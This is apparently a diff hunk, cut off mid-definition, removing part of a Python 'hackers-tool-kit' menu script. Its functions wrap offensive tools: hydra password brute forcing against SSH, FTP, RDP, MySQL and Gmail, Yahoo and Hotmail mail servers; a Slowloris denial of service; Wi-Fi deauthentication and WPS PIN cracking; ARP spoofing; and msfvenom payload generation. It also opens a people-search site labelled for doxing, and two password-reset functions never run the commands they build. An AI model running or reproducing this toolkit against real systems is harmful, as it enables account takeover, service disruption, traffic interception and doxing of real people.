: ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def 